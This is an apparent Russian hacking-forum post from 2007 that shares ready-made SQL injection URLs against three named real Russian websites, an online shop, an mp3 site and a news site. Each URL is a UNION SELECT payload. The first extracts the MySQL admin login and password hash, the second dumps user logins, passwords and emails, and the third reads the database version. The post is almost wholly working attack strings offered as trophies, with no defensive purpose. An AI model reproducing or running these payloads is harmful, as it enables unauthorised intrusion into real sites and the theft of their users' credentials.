|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
какой-то интернет-магазин... 
Код:
http://www.nordiz.ru/tovar.php?tovar_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(user,0x3a,password),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+mysql.user+limit+1,1/*
логин и mysql-хеш админа.
ps: 57 столбцов, ужс
//upd:
Код:
http://www.oxid.ru/mp3/mp3.php?id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+1,1/*
очередной mp3шник, на этот раз - бесплатный
формат данных login:рass:email
&&upd2:
Код:
http://www.eventor.ru/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*
название не подобрал =\
Последний раз редактировалось n1†R0x; 09.03.2007 в 11:32..
|